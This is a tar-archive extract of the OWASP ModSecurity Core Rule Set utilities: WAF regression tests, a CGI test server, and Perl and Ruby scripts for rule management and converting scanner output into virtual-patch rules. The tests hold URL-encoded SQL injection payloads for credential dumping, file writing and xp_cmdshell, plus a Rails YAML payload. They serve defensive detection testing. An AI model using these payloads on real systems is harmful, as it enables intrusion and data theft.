sig=6%20AND%20ASCII(SUBSTR((COALESCE(5%2C%20NULL))%2C%201%2C%201))%20%3E%2063 %endtest %test SQL Injection Attack (959073) ######################################## %output 959073 %var sig=-120%20union%20all%20select%201%2Ccast(table_name%20as%20text)%20from%20information_schema.columns-- %var sig=-1100%20UNION%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2Cconcat_ws(0x2b%2Cversion()%2Cuser()%2C%40%40version_compile_os)%2C10%2C11%2C12%20-- %endtest %test Detects blind sqli tests using sleep() or benchmark() (981272) ######################################## %output 981272 %var sig=-207%20union%20select%201%2Cconcat(%40i%3A%3D0x00%2C%40o%3A%3D0x0d0a%2Cbenchmark(23%2C%40o%3A%3DCONCAT(%40o%2C0x0d0a%2C(SELECT%20concat(table_schema%2C0x2E%2C%40i%3A%3Dtable_name)%20from%20information_schema.tables%20WHERE%20table_name%3E%40i%20order%20by%20table_name%20LIMIT%201)))%2C%40o)%2C3%2C4%2C5-- %var sig=13%20and%20sleep(3)%23 %endtest %test Detects basic SQL authentication bypass attempts 1/3 (981244) ######################################## %output 981244 %var sig=aaa'%20or%20(1)%3D(1)%20%23!asd %var sig=aa'%20LIKE%20md5(1)%20or%20'1 %endtest %test Detects MSSQL code execution and information gathering attempts (981255) ######################################## %output 981255 %var sig='%20union%20select%20concat(UserId%2Cchar(58)%2CUserPassword)%20from%20users%20into%20outfile%20'content%2F1.php'%2F* %var sig=1'%20or%201%3D(%40%40version%20)%3Bexec%20master..xp_cmdshell %endtest %test Detects MySQL comment-/space-obfuscated injections and backtick termination (981257) ######################################## %output 981257 %var sig=1%0bAND(SELECT%0b1%20FROM%20mysql.x) %endtest %test Detects chained SQL injection attempts 1/2 (981248) ######################################## %output 981248 %var sig=0%20div%201%20-%20union%23foo*%2F*bar%0Aselect%23foo%0A1%2C2%2Ccurrent_user %endtest %test Detects SQL benchmark and sleep injection attempts including conditional queries (981250) ######################################## %output 981250 %var sig=SELECT%20BENCHMARK(1000000%2CMD5(%E2%80%98A%E2%80%99))%3B %var sig=SELECT%20SLEEP(5)%3B%20%23%20%3E%3D%205.0.12 %endtest %test Detects conditional SQL injection attempts (981241) ######################################## %output 981241 %var sig=1194%20or%201%20group%20by%20concat(version()%2Cfloor(rand(0)*2))having%20min(0)%20or%201-- %endtest %test Detects MySQL charset switch and MSSQL DoS attempts (981252) ######################################## %output 981252 %var sig=-1'%3B%20if%20'1'%3D'1'%3B%20waitfor%20time%20'00%3A00%3A01'-- %endtest %test Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections (981256) ######################################## %output 981256 %var sig=-148)%20or%201%20group%20by%20concat(%40%40version%2Cfloor(rand(0)*2))%20having%20min(0)%20or%201%20-- %endtest %test Detects basic SQL authentication bypass attempts 2/3 (981245) ######################################## %output 981245 %var sig=-121%20union%20all%20select%201%2Cgroup_concat(Username%2C0x3a%2CPassword%2C0x3a%2CUserGroup)%2C3%2C4%2C5%20from%20uvp_Users %var sig=-10'%20union%20select%201%2Cconcat_ws(0x3a%2Ctable_name%2Ctable_schema)%2C3%20from%20information_schema.columns%20where%20column_name%20like%20'name'%23 %endtest �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_41_xss_attacks.tests����������������������������������������������������������������0000664�0000000�0000000�00000001103�12164572564�0035314�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 10 # FILE 41 - XSS Attacks %test Cross-site Scripting Attack ##################################################### %output 958414 %var xss= %request GET /?foo=$xss HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %endtest �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_50_outbound.tests�������������������������������������������������������������������0000775�0000000�0000000�00000012757�12164572564�0034650�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������# FILE 50 %timeout 10 %test weblogic information disclosure ######################################## %event 970021 %output 970021 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Status: 500 Internal Server Error Response-Content: <title>JSP compile error %endtest %test Zope information leakage ######################################## %event 970007 %output 970007 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content:

Site Error

An error was encountered while publishing this resource. %endtest %test CF information leakage ######################################## %event 970008 %output 970008 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content: The error occurred in script.cfm: line 11 bla bla bla Please try the following:
Check the ColdFusion documentation to verify that you are using the correct syntax. bla bla Stack Trace (click to expand) %endtest %test PHP information leakage ######################################## %event 970009 %output 970009 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content: Warning mysql_fetch_row(): supplied argument ... in /web/jvcjazz/intl_view.php on line 142 %endtest %test ISA server existence revealed ######################################## %event 970010 %output 970010 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content: 403 Forbidden - The ISA Server denies the specified Uniform Resource ...bla bla bla... Internet Security and Acceleration Server %endtest %test Local file link ######################################## %event 970011 %output 970011 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content: This is my sensitive data, do not touch %endtest %test Microsoft office doc properties leakage ######################################## %event 970012 %output 970012 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content: %endtest %test Directory Listing (apache) ######################################## %event 970013 %output 970013 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content: Index of /~avi

Index of /~avi

%endtest %test CF source code leakage ######################################## %event 970016 %output 970016 %request GET /cgi-bin/testserver.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive Response-Content: %test Ruby on Rails Vuln - CVE-2013-0156 - 1 ######################################## %output 999010 %var sig=--- !ruby/object:UnsafeObject attribute1: value1 %var sig=--- !ruby/string:Arel::Nodes::SqlLiteral \"' OR '2' < '6';--\" %var type=yaml %endtest SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/testserver.cgi000066400000000000000000000014201216457256400277100ustar00rootroot00000000000000#!/usr/bin/perl use CGI qw/:standard/; $response_status = http('Response-Status') || "200 OK"; $response_content = http('Response-Content'); $response_type = http('Response-Content-Type') || "text/html"; $response_new_header_name = http('Response-Header-Name'); $response_new_header_value = http('Response-Header-Value'); $response_new_header = defined($response_new_header_name) ? $response_new_header_name . ': ' . $response_new_header_value : undef; if (defined($response_new_header)) { print header ($response_type, $response_status, undef, undef, undef, undef, undef, undef, undef,$response_new_header); } else { print header ($response_type, $response_status); } print start_html('rule set tester'); print h1('rule set tester'); print $response_content; SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/rule-management/000077500000000000000000000000001216457256400245625ustar00rootroot00000000000000SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/rule-management/id-range000066400000000000000000000000361216457256400261720ustar00rootroot00000000000000900000-2999999 2000000-299999 SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/rule-management/remove-2.7-actions.pl000066400000000000000000000057161216457256400303670ustar00rootroot00000000000000#!/opt/local/bin/perl ############################################# # -=[ Virtual Patching Converter Script ]=- # # Converts to previous modsec versions # # # # modsec2modsec.pl # # Version: 1.0 # # # # Copyright 2013 # # Mathieu Parent # ############################################# use strict; use warnings; use Getopt::Std; use File::Find (); use File::Copy; # Parse options my %opts; getopts("t:f:nvd",\%opts); my $target_version = $opts{'t'}; my $filename = $opts{'f'}; my $no_backup = $opts{'n'}; my $verbose = $opts{'v'}; my $debug = $opts{'d'}; # Check options unless ($target_version && $filename) { print "Flag:\n\n". "\t -t:\t target version\n". "\t -f:\t file or directory to convert\n". "\t -n:\t no backup file\n". "\t -v:\t be verbose\n". "\t -d:\t debug\n". "Usage:\n\n". "\t./modsec2modsec.pl -t 2.6 -f .\n\n"; exit 1; } unless ($target_version eq '2.6') { print "Unknown target version $target_version. Use one of: 2.6.\n"; exit 1; } my @target_version = split( /\./, $target_version ); # Suffixes my $bck = '.old'; # Backup suffix my $tmp = '.tmp'; # Tempfile suffix # Traverse directory File::Find::find({wanted => \&process, no_chdir => 1}, $filename); exit 0; sub target_version_below { # Caveats: Only versions X.Y are supported my @ver = split( /\./, shift ); return ( $target_version[0] < $ver[0] || $target_version[1] < $ver[1] ); } sub process { my ($dev,$ino,$mode,$nlink,$uid,$gid); (($dev,$ino,$mode,$nlink,$uid,$gid) = lstat($_)) && -f _ && /^.*\.conf\z/s && process_file($File::Find::name); } sub process_file { my $filename = shift; print "Processing $filename\n" if $verbose; # Clean up any remaining tempfile if (-f "$filename$tmp") { print "Deleting $filename$tmp\n" if $debug; unlink "$filename$tmp" or die "Unable to delete $filename$tmp: $!"; } # Open both input and output open(my $input, '<', $filename) or die "Unable to open $filename: $!"; open(my $output, '>', "$filename$tmp") or die "Unable to open $filename$tmp: $!"; # Read input line by line while (<$input>) { if (target_version_below('2.7')) { s/ver:'[^']+',//; s/maturity:'[^']+',//; s/accuracy:'[^']+',//; } print $output $_; } close($input); close($output); if (!$no_backup && -f "$filename$bck") { print "Deleting $filename$bck\n" if $debug; unlink "$filename$bck" or die "Unable to delete $filename$bck: $!"; } if (!$no_backup) { print "Moving $filename to $filename$bck\n" if $debug; move($filename, "$filename$bck") or die "Unable to move $filename to $filename$bck: $!"; } print "Moving $filename$tmp to $filename\n" if $debug; move("$filename$tmp", $filename) or die "Unable to open $filename$tmp to $filename: $!"; } SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/rule-management/verify.rb000077500000000000000000000064701216457256400264250ustar00rootroot00000000000000#!/usr/bin/env ruby # -*- coding: utf-8 -*- # # Copyright © 2012 Diego Elio Pettenò # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS # ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES # OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE # CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL # DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR # PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS # ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS # SOFTWARE. require 'set' seen_ids = Set.new res = 0 # read reserved id range from the id-range file so that it can be # configured on a per-repository basis. range = Range.new(*File.read('id-range').rstrip.split('-').map(&:to_i)) # open all the rule files Dir.chdir("../../") Dir["**/*.conf"].each do |rulefile| # read the content content = File.read(rulefile) lineno = 0 this_chained = next_chained = false prevline = nil # for each line in the rule file content.each_line do |line| lineno += 1 # handle continuation lines line = (prevline + line) unless prevline.nil? # remove comments line.gsub!(/^([^'"]|'[^']+'|"[^"]+")#.*/) { $1 } if line =~ /\\\n$/ prevline = line.gsub(/\\\n/, '') next else prevline = nil end # skip if it's an empty line (this also skip comment-only lines) next if line =~ /(?:^\s+$|^#)/ this_chained = next_chained next_chained = false # split the directive in its components, considering quoted strings directive = line.scan(/([^'"\s][^\s]*[^'"\s]|'(?:[^']|\\')*[^\\]'|"(?:[^"]|\\")*[^\\]")(?:\s+|$)/).flatten directive.map! do |piece| # then make sure to split the quoting out of the quoted strings (piece[0] == '"' || piece[0] == "'") ? piece[1..-2] : piece end # skip if it's not a SecRule or SecAction case directive[0] when "SecRule" rawrule = directive[3] when "SecAction" rawrule = directive[1] else next end # get the rule and split in its components rule = (rawrule || "").gsub(/(?:^"|"$)/, '').split(/\s*,\s*/) if rule.include?("chain") next_chained = true end ids = rule.find_all { |piece| piece =~ /^id:/ } if ids.size > 1 $stderr.puts "#{rulefile}:#{lineno} rule with multiple ids" next elsif ids.size == 0 id = nil else id = ids[0].sub(/^id:/, '').gsub(/(?:^'|'$)/, '').to_i end if this_chained unless id.nil? $stderr.puts "#{rulefile}:#{lineno} chained rule with id" res = 1 end next elsif id.nil? $stderr.puts "#{rulefile}:#{lineno} rule missing id (#{rule.join(',')})" res = 1 next elsif ! range.include?(id) $stderr.puts "#{rulefile}:#{lineno} rule with id #{id} outside of reserved range #{range}" res = 1 elsif seen_ids.include?(id) $stderr.puts "#{rulefile}:#{lineno} rule with duplicated id #{id}" res = 1 end seen_ids << id end end exit res SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/virtual-patching/000077500000000000000000000000001216457256400247625ustar00rootroot00000000000000SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/virtual-patching/arachni2modsec.pl000077500000000000000000000306461216457256400302150ustar00rootroot00000000000000#!/opt/local/bin/perl -T ############################################# # -=[ Virtual Patching Converter Script ]=- # # Converts arachni XML Ouput # # https://github.com/Zapotek/arachni # # # # arachni2modsec.pl # # Version: 1.0 # # # # Copyright 2011 # # Trustwave's SpiderLabs Research Team # # www.trustwave.com # # # # Based On Code Originally Created by: # # The Denim Group # # www.denimgroup.com # ############################################# use XML::Smart; use Switch; use Data::Types qw(:all); use Data::Validate::URI qw(is_uri); use Getopt::Std; use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later ############# # Variables # ############# # [Configuration Vars] my %param; getopt("f",\%param); $filename = $param{f}; my $all_vulnerabilities_filename = "$filename"; unless ($filename) { print "Flag:\n\n\t -f:\t path to arachni xml report file\nUsage:\n\n\t./arachni2modsec.pl -f ./arachni_report.xml\n\n"; exit; } my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf"; # [End Config Vars] my $VULN_CLASS_XSS = "Cross-Site Scripting (XSS)"; my $VULN_CLASS_SQLI = "SQL Injection"; my $VULN_CLASS_BLIND_SQLI = "Blind SQL Injection"; my $VULN_CLASS_LFI = "Path Traversal"; my $VULN_CLASS_RFI = "Remote file inclusion"; my $VULN_CLASS_HTTPRS = "Response splitting"; # Only the vulnerabilities in this array will have # rules generated for them. my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_BLIND_SQLI, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS); my $num_rules_generated=0; my $num_not_supported=0; my $num_bad_urls=0; my $wait_for_keypress=1; my $request_failed=0; my $all_vulns_xml; my @type; my @id; my $vuln_count; my $num_attacks_flag=0; my $num_attacks_noflag=0; # End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ############# # Main # ############# # Clean up env so perl doesn't complain # when trying to run the restart snort # script. delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)}; $all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename); @type = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','name'); @url = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','url'); @param = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','variable'); open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file"; $MODSEC_RULES->autoflush(1); $vuln_count = 0; foreach my $current_type (@type){ print "==================================================================================================\n"; print "Vulnerability[$vuln_count] - Type: $current_type\n"; if(exists {map { $_ => 1 } @supported_vulns}->{$current_type}){ parseData(to_string($current_type)); }else { print "Vulnerability Type: $type is not supported in this version.\n"; $num_not_supported++; } $vuln_count++; } close($MODSEC_RULES); print "==================================================================================================\n"; print "\n\n************ END OF SCRIPT RESULTS *****************\n"; print "Number of Vulnerabilities Processed: $vuln_count\n"; print "Number of ModSecurity rules generated: $num_rules_generated\n"; print "Number of Unsupported vulns skipped: $num_not_supported\n"; print "Number of bad URLs (rules not gen): $num_bad_urls\n"; print "****************************************************\n\n"; print "----------------------------------------------------\n"; print "To activate the virtual patching file ($modsec_rules_file),\n"; print "copy it into the CRS \"base_rules\" directory and then create\n"; print "a symlink to it in the \"activated_rules\" directory.\n"; print "-----------------------------------------------------\n\n"; ############### # Subroutines # ############### sub parseData { my($vuln_str) = @_; my $vuln_detail_filename; my $current_vuln_xml; my $current_vuln_url; my $current_vuln_param; my $current_uricontent; my @current_params; my $id = $vuln_count; print "Found a $vuln_str vulnerability.\n"; $current_vuln_xml = XML::Smart->new($all_vulnerabilities_filename); $current_vuln_url = $url[$vuln_count]; print URL_LIST "$current_vuln_url\n"; # Validate url (need seperate sub?) print "Validating URL: $current_vuln_url\n"; if(is_uri(to_string($current_vuln_url))){ print "URL is well-formed\n"; print "Continuing Rule Generation\n"; } else { print "URL is NOT well-formed. Breaking Out of Rule Generation\n"; $num_bad_urls++; # Waits for keypress in test mode so you can # see why the URL failed validation. if($test_mode){ wait_for_keypress(); } return; } $current_uricontent = get_uricontent($current_vuln_url); # Only need param if XSS attack,SQLINJ,XPATH # and maybe for HTTPRS, DT. # NOT for PRL and DI if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ @current_params = $param[$vuln_count]; } if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ print "Current vulnerable Param(s): @current_params\n"; } generate_patch($vuln_str,$current_uricontent,@current_params); } sub generate_patch { my($type,$uricontent,@params,$current_vuln_xml) = @_; my $rule = ""; $id = "1".$vuln_count; switch($type) { case ($VULN_CLASS_XSS) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ # Check to see if each vulnerable parameter is valid # then generate a rule using both uricontent and the # parameter $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/XSS.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_XSS (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_SQLI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_BLIND_SQLI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_LFI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/LFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_RFI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/RFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_HTTPRS) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/RESPONSE_SPLITTING.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_RFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } } } sub get_uricontent { my($url) = @_; my $regex = "http:\/\/+[a-zA-Z0-9.:-]*\/"; # First, trim the first part out of the URL: # http://.../ $url =~ /$regex/; substr($url,index($url,$&),length($&)) = ""; # If the URL contains a php or cgi query with # one or more params and values, trim those out. # Trim from the question mark to the end. if($url =~ /\?/){ substr($url,index($url,"?")) = ""; } return $url; } SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/virtual-patching/zap2modsec.pl000077500000000000000000000307231216457256400273760ustar00rootroot00000000000000#!/opt/local/bin/perl -T ############################################# # -=[ Virtual Patching Converter Script ]=- # # Converts OWASP ZAP XML Ouput # # https://code.google.com/p/zaproxy/ # # # # zap2modsec.pl # # Version: 1.0 # # # # Copyright 2011 # # Trustwave's SpiderLabs Research Team # # www.trustwave.com # # # # Based On Code Originally Created by: # # The Denim Group # # www.denimgroup.com # ############################################# use XML::Smart; use Switch; use Data::Types qw(:all); use Data::Validate::URI qw(is_uri); use Getopt::Std; use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later ############# # Variables # ############# # [Configuration Vars] my %param; getopt("f",\%param); $filename = $param{f}; my $all_vulnerabilities_filename = "$filename"; unless ($filename) { print "Flag:\n\n\t -f:\t path to ZAP xml report file\nUsage:\n\n\t./zap2modsec.pl -f ./zap_report.xml\n\n"; exit; } my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf"; # [End Config Vars] my $VULN_CLASS_XSS = "Cross Site Scripting"; my $VULN_CLASS_SQLI = "SQL Injection"; my $VULN_CLASS_SQLI_FINGERPRINT = "SQL Injection Fingerprinting"; my $VULN_CLASS_LFI = "Path Traversal"; my $VULN_CLASS_RFI = "Remote File Inclusion"; my $VULN_CLASS_HTTPRS = "HTTP Response Splitting"; # Only the vulnerabilities in this array will have # rules generated for them. my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_SQLI_FINGERPRINT, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS); my $num_rules_generated=0; my $num_not_supported=0; my $num_bad_urls=0; my $wait_for_keypress=1; my $request_failed=0; my $all_vulns_xml; my @type; my @id; my $vuln_count; my $num_attacks_flag=0; my $num_attacks_noflag=0; # End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ############# # Main # ############# # Clean up env so perl doesn't complain # when trying to run the restart snort # script. delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)}; $all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename); @type = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','alert'); @url = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','uri'); @param = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','param'); open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file"; $MODSEC_RULES->autoflush(1); $vuln_count = 0; foreach my $current_type (@type){ print "==================================================================================================\n"; print "Vulnerability[$vuln_count] - Type: 